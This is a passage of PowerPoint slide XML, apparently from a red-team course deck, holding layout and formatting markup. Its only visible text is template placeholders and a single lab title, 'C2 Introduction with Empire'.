                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buSzPct val="120000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2">
                  <a:extLst>
                    <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                      <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId4"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
              </a:buBlip>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Lab 1.5: C2 Introduction with Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buSzPct val="120000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197394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b introduction">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="15000">
              <a:srgbClr val="001C29"/>
            </a:gs>
            <a:gs pos="85000">
              <a:schemeClr val="accent1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="20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EF3558-F72B-4042-9DD3-27D48E83B89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8" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B911596D-96EE-6843-A234-B6A9D4560FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666426" y="2213642"/>
            <a:ext cx="11525574" cy="2061861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rIns="1800000" bIns="21600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lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;Lab name&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53E1F817-BAD7-446A-8E6E-D66E7785EFCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4343400"/>
            <a:ext cx="11010900" cy="1171575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:latin typeface="+mn-lt"/>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&lt;Add any additional needed information here, such as what VM or other assets the students need for the lab. Do not include time estimates or objectives as that information should be included in the workbook.&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDE2135-ABD7-F777-4723-A7C5BC829469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701390" y="6305550"/>
            <a:ext cx="8490235" cy="369332"/>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tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Refer to the lab workbook for instructions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40526429-DF23-965A-16D9-5239B0DAD887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514349" y="-1"/>
            <a:ext cx="2748613" cy="1457326"/>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4" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019F8352-A11B-8B88-43F7-ECCFE454E0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01390" y="721471"/>
            <a:ext cx="830493" cy="415244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558E1972-4BB2-D6D2-143D-D646C76AD125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657895" y="721471"/>
            <a:ext cx="0" cy="404035"/>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6" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A853DAE-D7D9-2222-8E0A-56610D7359D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806035" y="728295"/>
            <a:ext cx="1317488" cy="408355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F1254E0-17FF-C6AB-1240-4EEB0D20801E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915401" y="299803"/>
            <a:ext cx="3276598" cy="662222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600" b="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="490050" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="490050" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="857250" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="490050" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;Lab #&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36862172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605-90DD-BA48-B96B-D53F11571999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5757AB70-7D07-7930-F838-66707C0F171B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1233488"/>
            <a:ext cx="11334750"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530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bulleted content">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4F833F3-0932-5145-B324-EF6D0264C095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1233488"/>
            <a:ext cx="11334750" cy="5199062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400" spc="-20" baseline="0">
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="406800" indent="-169200">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:defRPr sz="1400" spc="-10" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="640800" indent="-172800">
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="640800" indent="-172800">
              <a:buSzPct val="80000"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="2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13338EB9-A644-434D-924B-9A10AA78C9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0543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EBBCF1-8D71-E640-9E05-EE0D2D81B1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="1233488"/>
            <a:ext cx="11323638" cy="5199063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D72292-0DA8-C04E-9F5F-A3B04A4E56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16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4" name="Content Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B2A574-B855-6F51-59B6-CD7646B0AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625"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853CE527-71A5-F6B9-C27C-AD5A9FF24828}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191249"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8739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65A1CF-80BB-BA48-98D8-EB66F99BFFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>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9FAE09E-8E87-0C4D-9449-4035A6A01E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="428624"/>
            <a:ext cx="11334750" cy="623211"/>
          </a:xfrm>
          <a:prstGeom prst="callout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99409"/>
              <a:gd name="adj2" fmla="val 100036"/>
              <a:gd name="adj3" fmla="val 99227"/>
              <a:gd name="adj4" fmla="val -59"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:alpha val="15000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="180000" rIns="0" bIns="108000" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1C436B-155D-4241-A354-7C3170A25D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8188960" y="0"/>
            <a:ext cx="4003038"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228600" bIns="72000" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SEC565 | Red Team Operations and Adversary Emulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD20975E-CD01-9D1C-C4FC-97F0EDD16BC6}"/>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6FC588-118F-F274-732F-34270CEE2AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>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5D6FFA-FA6B-86C0-459F-7418F7C04769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="0"/>
            <a:ext cx="1165148" cy="428624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74D26CD2-0B64-75CB-4244-4930A6BB8844}"/>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509308" y="179324"/>
            <a:ext cx="337375" cy="168687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DECEB8-8317-C918-14E0-53152F6E3893}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>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9" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623F9935-BBB5-5B50-D96C-BB4FD43E0E76}"/>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970590" y="179323"/>
            <a:ext cx="535052" cy="165839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957551618"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483695" r:id="rId1"/>
    <p:sldLayoutId id="2147483997" r:id="rId2"/>
    <p:sldLayoutId id="2147483996" r:id="rId3"/>
    <p:sldLayoutId id="2147483699" r:id="rId4"/>
    <p:sldLayoutId id="2147483696" r:id="rId5"/>
    <p:sldLayoutId id="2147483700" r:id="rId6"/>
    <p:sldLayoutId id="2147483701" r:id="rId7"/>
    <p:sldLayoutId id="2147483702" r:id="rId8"/>
    <p:sldLayoutId id="2147483703" r:id="rId9"/>
    <p:sldLayoutId id="2147483995" r:id="rId10"/>
    <p:sldLayoutId id="2147483706" r:id="rId11"/>
    <p:sldLayoutId id="2147483707" r:id="rId12"/>
    <p:sldLayoutId id="2147483998" r:id="rId13"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2400" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="171450" marR="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400" b="0" i="0" kern="1200" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="228600" marR="0" indent="228600"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2200" b="0" i="0" kern="1200" dirty="0" smtClean="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smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="776288" marR="0" indent="252413" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzTx/>
        <a:buFont typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
        <a:buChar char="−"/>
        <a:tabLst/>
        <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="83295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100" b="0" kern="1200" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6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6pPr>
      <a:lvl7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7pPr>
      <a:lvl8pPr marL="777600" indent="-230400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buFont typeface="System Font Regular"/>
        <a:buChar char="–"/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="776288" indent="252413" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buFont typeface="System Font Regular"/>
        <a:buNone/>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:lumOff val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:defPPr>
        <a:defRPr lang="en-US"/>
      </a:defPPr>
      <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="ctr" latinLnBrk="0" hangingPunct="1">
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>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0" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="7410" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="41" orient="horz" pos="268" userDrawn="1">
